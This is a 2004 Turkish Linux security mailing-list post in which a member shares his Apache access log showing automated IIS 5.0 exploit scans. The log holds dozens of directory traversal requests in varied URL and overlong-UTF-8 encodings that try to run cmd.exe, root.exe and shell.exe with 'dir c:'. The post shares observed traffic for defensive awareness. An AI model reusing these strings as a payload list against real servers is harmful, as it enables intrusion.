[Linux-guvenlik] buyuyunce hekir olcak

From: Baybars Uzunoglu (baybarsu@gmail.com)
Date: Fri 12 Nov 2004 - 08:31:02 EET

• Previous message: Alper Oguz: "RE: [Linux-guvenlik] backup-restore"
• Next in thread: Alper Oguz: "RE: [Linux-guvenlik] buyuyunce hekir olcak"

arkadaslar merhaba grupta yeniyim
dunku apache log'umun 1 bolumunu gonderiyorum, bu iis5.0'in expoloit'i
arkadar apache de denemis, ip numaralari usa ve kore'nin sahip oldugu
ip'lerdir herkese iyi calismalar.

baybars

24.129.198.229 - - [11/Nov/2004:05:01:08 +0200] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ver HTTP/1.0" 404
328
222.103.205.223 - - [11/Nov/2004:06:24:06 +0200] "GET
/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 317
222.103.205.223 - - [11/Nov/2004:06:24:07 +0200] "GET
/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 314
222.103.205.223 - - [11/Nov/2004:06:24:08 +0200] "GET
/_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 336
222.103.205.223 - - [11/Nov/2004:06:24:10 +0200] "GET
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:11 +0200] "GET
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:12 +0200] "GET
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 344
222.103.205.223 - - [11/Nov/2004:06:24:13 +0200] "GET
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 346
222.103.205.223 - - [11/Nov/2004:06:24:15 +0200] "GET
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 344
222.103.205.223 - - [11/Nov/2004:06:24:16 +0200] "GET
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 339
222.103.205.223 - - [11/Nov/2004:06:24:17 +0200] "GET
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 337
222.103.205.223 - - [11/Nov/2004:06:24:19 +0200] "GET
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 346
222.103.205.223 - - [11/Nov/2004:06:24:20 +0200] "GET
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 339
222.103.205.223 - - [11/Nov/2004:06:24:21 +0200] "GET
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 347
222.103.205.223 - - [11/Nov/2004:06:24:23 +0200] "GET
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 340
222.103.205.223 - - [11/Nov/2004:06:24:24 +0200] "GET
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 345
222.103.205.223 - - [11/Nov/2004:06:24:25 +0200] "GET
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 338
222.103.205.223 - - [11/Nov/2004:06:24:26 +0200] "GET
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 347
222.103.205.223 - - [11/Nov/2004:06:24:28 +0200] "GET
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 347
222.103.205.223 - - [11/Nov/2004:06:24:29 +0200] "GET
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 340
222.103.205.223 - - [11/Nov/2004:06:24:30 +0200] "GET
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 338
222.103.205.223 - - [11/Nov/2004:06:24:32 +0200] "GET
/msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 333
222.103.205.223 - - [11/Nov/2004:06:24:33 +0200] "GET
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:34 +0200] "GET
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:36 +0200] "GET
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:37 +0200] "GET
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:38 +0200] "GET
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 333
222.103.205.223 - - [11/Nov/2004:06:24:39 +0200] "GET
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 337
222.103.205.223 - - [11/Nov/2004:06:24:41 +0200] "GET
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 333
222.103.205.223 - - [11/Nov/2004:06:24:42 +0200] "GET
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 337
222.103.205.223 - - [11/Nov/2004:06:24:43 +0200] "GET
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 334
222.103.205.223 - - [11/Nov/2004:06:24:45 +0200] "GET
/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 327
222.103.205.223 - - [11/Nov/2004:06:24:46 +0200] "GET
/msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:
HTTP/1.1" 404 324
222.103.205.223 - - [11/Nov/2004:06:24:47 +0200] "GET
/msdac/root.exe?/c+dir+c: HTTP/1.1" 404 299
222.103.205.223 - - [11/Nov/2004:06:24:48 +0200] "GET
/msdac/shell.exe?/c+dir+c: HTTP/1.1" 404 300
222.103.205.223 - - [11/Nov/2004:06:24:50 +0200] "GET
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:51 +0200] "GET
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:52 +0200] "GET
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 331
222.103.205.223 - - [11/Nov/2004:06:24:54 +0200] "GET
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 331
222.103.205.223 - - [11/Nov/2004:06:24:55 +0200] "GET
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:24:56 +0200] "GET
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1"
400 313
222.103.205.223 - - [11/Nov/2004:06:24:57 +0200] "GET
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 326
222.103.205.223 - - [11/Nov/2004:06:24:59 +0200] "GET
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1"
404 326
222.103.205.223 - - [11/Nov/2004:06:25:00 +0200] "GET
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 345
222.103.205.223 - - [11/Nov/2004:06:25:01 +0200] "GET
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 338
222.103.205.223 - - [11/Nov/2004:06:25:03 +0200] "GET
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 321
222.103.205.223 - - [11/Nov/2004:06:25:04 +0200] "GET
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404
325
222.103.205.223 - - [11/Nov/2004:06:25:05 +0200] "GET
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 335
222.103.205.223 - - [11/Nov/2004:06:25:07 +0200] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404
325
222.103.205.223 - - [11/Nov/2004:06:25:08 +0200] "GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:25:09 +0200] "GET
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 331
222.103.205.223 - - [11/Nov/2004:06:25:10 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322
222.103.205.223 - - [11/Nov/2004:06:25:12 +0200] "GET
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:25:13 +0200] "GET
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 331
222.103.205.223 - - [11/Nov/2004:06:25:14 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322
222.103.205.223 - - [11/Nov/2004:06:25:16 +0200] "GET
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:25:17 +0200] "GET
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 331
222.103.205.223 - - [11/Nov/2004:06:25:21 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322
222.103.205.223 - - [11/Nov/2004:06:25:23 +0200] "GET
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404 322
222.103.205.223 - - [11/Nov/2004:06:25:24 +0200] "GET
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 313
222.103.205.223 - - [11/Nov/2004:06:25:25 +0200] "GET
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 404
323
222.103.205.223 - - [11/Nov/2004:06:25:26 +0200] "GET
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1"
404 324
222.103.205.223 - - [11/Nov/2004:06:25:28 +0200] "GET
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 325
222.103.205.223 - - [11/Nov/2004:06:25:29 +0200] "GET
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
HTTP/1.1" 404 326
222.103.205.223 - - [11/Nov/2004:06:25:30 +0200] "GET
/scripts/root.exe?/c+dir+c: HTTP/1.1" 404 301
222.103.205.223 - - [11/Nov/2004:06:25:32 +0200] "GET
/scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 302

_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik

• Previous message: Alper Oguz: "RE: [Linux-guvenlik] backup-restore"
• Next in thread: Alper Oguz: "RE: [Linux-guvenlik] buyuyunce hekir olcak"